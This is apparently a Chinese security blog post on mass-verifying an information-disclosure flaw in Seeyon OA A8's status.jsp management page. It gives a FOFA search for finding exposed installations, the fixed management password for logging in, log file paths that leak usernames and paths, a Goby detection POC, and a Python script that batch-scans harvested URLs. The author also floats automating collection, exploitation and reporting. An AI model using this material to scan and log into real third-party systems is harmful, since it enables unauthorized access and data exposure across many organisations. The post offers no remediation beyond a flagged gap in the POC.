前言部分
在本节中,我会分两部分来说明致远OA A8 status.jsp 信息泄露的验证问题。其实就是两种验证方式,本质相同,都是批量验证,主要如下所示:
- 通过Python脚本进行批量验证,但是前提是你可以收集到所有致远OA A8的地址(URL)。我一般使用两款工具进行收集:
  - FOFA:https://fofa.info/
  - 鹰图:https://hunter.qianxin.com/
- 通过Goby进行批量验证。
啊,我个人感觉,其实这一部分可以做成自动化攻击的,当然我知道某些大厂内部已经有很多自动化攻击工具了,毕竟我始终是个小白,其实这一部分的自动化,无非就是:收集资产—验证漏洞—利用漏洞—形成报告。不管是用python,还是go,还是ruby,还是java,就是个时间问题吧。有时间、有兴趣的小伙伴可以钻研一下。
正文部分
简介
漏洞名称:致远OA A8 status.jsp 信息泄露
漏洞详情
在致远OA A8-m系统中,存在一个安全漏洞,该漏洞导致状态监控页面的信息保护不当。由于这一问题,潜在的攻击者能够访问并提取关键信息,如网站的具体路径和用户的登录名等敏感数据。这些信息的泄露可能为攻击者提供了进一步对系统进行攻击的机会。
漏洞复现
第一步、在FOFA中使用 title="A8-m" 查找资产。
第二步、判断是否存在对应页面:/seeyon/management/status.jsp
第三步、使用密码WLCCYBD@SEEYON登录。
复现结果:
通过下面的URL可以获得敏感信息:
/seeyon/management/status.jsp
/seeyon/logs/login.log
/seeyon/logs/v3x.log
批量验证
Goby 批量验证 POC
package exploits
import (
"git.gobies.org/goby/goscanner/goutils"
)
// init registers this Goby check with ExpManager at package load time.
//
// The JSON below is the whole check definition. ScanSteps issue a single GET
// to /seeyon/management/index.jsp and report a finding only when the response
// code is 200 and the body contains both "Management Monitor" and "Password",
// i.e. the management monitor login page is reachable from the network. The
// Cookie header carries a fixed JSESSIONID copied from a browser; it does not
// establish a session and presumably is not needed for the check — confirm.
//
// ExploitSteps still hold the template placeholder (GET /test.php expecting
// "test" in the body) and HasExp is false, so this entry is detection-only.
// The EN Translation block repeats the Chinese text and embeds inline HTML
// styling in Description.
//
// NOTE(review): Recommendation and Impact are empty. The description itself
// says the exposed pages are gated only by a fixed password, so the
// remediation a reader needs (restrict network access to the /seeyon/management
// path and change that password) is not recorded in the check.
func init() {
	expJson := `{
"Name": "致远OA A8 status.jsp 信息泄露",
"Description": "<p>利用该漏洞可读取致远OA A8 中的敏感信息,包括日志信息、服务器状态信息等。经验证存在的页面,使用WLCCYBD@SEEYON作为密码可以登录。<br></p>",
"Product": "致远OA",
"Homepage": "https://www.seeyon.com/",
"DisclosureDate": "2024-03-22",
"PostTime": "2024-03-22",
"Author": "",
"FofaQuery": "title=\"A8-m\"",
"GobyQuery": "title=\"A8-m\"",
"Level": "1",
"Impact": "",
"Recommendation": "",
"References": [],
"Is0day": false,
"HasExp": false,
"ExpParams": [
{
"name": "",
"type": "input",
"value": "",
"show": ""
}
],
"ExpTips": {
"Type": "",
"Content": ""
},
"ScanSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "/seeyon/management/index.jsp",
"follow_redirect": true,
"header": {
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7",
"Accept-Encoding": "gzip, deflate",
"Accept-Language": "zh-CN,zh;q=0.9",
"Cache-Control": "max-age=0",
"Connection": "keep-alive",
"Cookie": "JSESSIONID=5E2354B7A7C884BA110199C3A2B803A2",
"Upgrade-Insecure-Requests": "1",
"User-Agent": "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.289 Mobile Safari/537.36"
},
"data_type": "text",
"data": ""
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "Management Monitor",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "Password",
"bz": ""
}
]
},
"SetVariable": []
}
],
"ExploitSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "/test.php",
"follow_redirect": true,
"header": {},
"data_type": "text",
"data": ""
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "test",
"bz": ""
}
]
},
"SetVariable": []
}
],
"Tags": [
"信息泄露"
],
"VulType": [
"信息泄露"
],
"CVEIDs": [
""
],
"CNNVD": [
""
],
"CNVD": [
""
],
"CVSSScore": "",
"Translation": {
"CN": {
"Name": "致远OA A8 status.jsp 信息泄露",
"Product": "致远OA",
"Description": "<p>利用该漏洞可读取致远OA A8 中的敏感信息,包括日志信息、服务器状态信息等。经验证存在的页面,使用WLCCYBD@SEEYON作为密码可以登录。<br></p>",
"Recommendation": "",
"Impact": "",
"VulType": [
"信息泄露"
],
"Tags": [
"信息泄露"
]
},
"EN": {
"Name": "致远OA A8 status.jsp 信息泄露",
"Product": "致远OA",
"Description": "<p>利用该漏洞可读取致远OA A8 中的敏感信息,包括日志信息、服务器状态信息等。经验证存在的页面,使用<span style=\"color: rgb(58, 55, 55); font-size: 16px;\">WLCCYBD@SEEYON作为密码可以登录。</span><br></p>",
"Recommendation": "",
"Impact": "",
"VulType": [
"Information Disclosure"
],
"Tags": [
"Information Disclosure"
]
}
},
"AttackSurfaces": {
"Application": null,
"Support": null,
"Service": null,
"System": null,
"Hardware": null
}
}`
	// Register the definition; the two nil arguments are presumably the
	// optional custom scan/exploit callbacks, both unused here since the JSON
	// ScanSteps drive detection — confirm against NewExploit's signature.
	ExpManager.AddExploit(NewExploit(
		goutils.GetFileName(),
		expJson,
		nil,
		nil,
	))
}
验证过程:
通过Goby的Fofa插件,批量导入。
然后直接选择POC进行验证。
验证结果:
Python 批量验证 POC
import requests
# Batch check: read one host or URL per line from verify.txt, request the
# Seeyon management status page on each, and record the ones whose 200
# response contains the "Management Monitor" and "Password" strings. A hit
# means the management monitor page is reachable from the network; that
# exposure is what the asset owner needs to remediate.
# Assumes a text file verify.txt containing the URLs, one per line.
input_file_path = r'E:\UserData\Desktop\verify.txt'
output_file_path = r'E:\UserData\Desktop\result.txt'
# Full URLs whose response matched both markers
valid_urls: list[str] = []
# Read the input file and process each URL; file-level errors are reported
# by the except clauses at the bottom
try:
    with open(input_file_path, 'r') as input_file:
        for line in input_file:
            url = line.strip()  # drop the trailing newline and surrounding whitespace
            # Prepend http:// when the line carries no scheme
            if not url.lower().startswith(('http://', 'https://')):
                url = 'http://' + url
            # Path of the page being checked
            full_url = f"{url}/seeyon/management/status.jsp"
            # One request per host; network errors are printed and the host skipped
            try:
                response = requests.get(full_url, timeout=10)  # 10 s per-request timeout
                # Both marker strings must appear in a 200 body to count as a hit
                if response.status_code == 200:
                    if "Management Monitor" in response.text and "Password" in response.text:
                        valid_urls.append(full_url)
                        print(f"Valid URL found: {full_url}")
            except requests.exceptions.RequestException as e:
                print(f"Error accessing {full_url}: {e}")
    # Write the matched URLs to the output file, one per line
    with open(output_file_path, 'w') as output_file:
        for url in valid_urls:
            output_file.write(url + '\n')
    print("Process completed. Valid URLs have been saved to result.txt.")
except FileNotFoundError:
    print(f"The file {input_file_path} was not found.")
except IOError as e:
    print(f"An I/O error occurred: {e}")
这个脚本会把符合预期结果的 URL 保存在 result.txt 中,代码没有做完善,感兴趣的话可以自己修改一下。
我测试发现结果没跑全,因为https 的问题吧?反正有 goby 在,我也懒得去鼓秋代码了。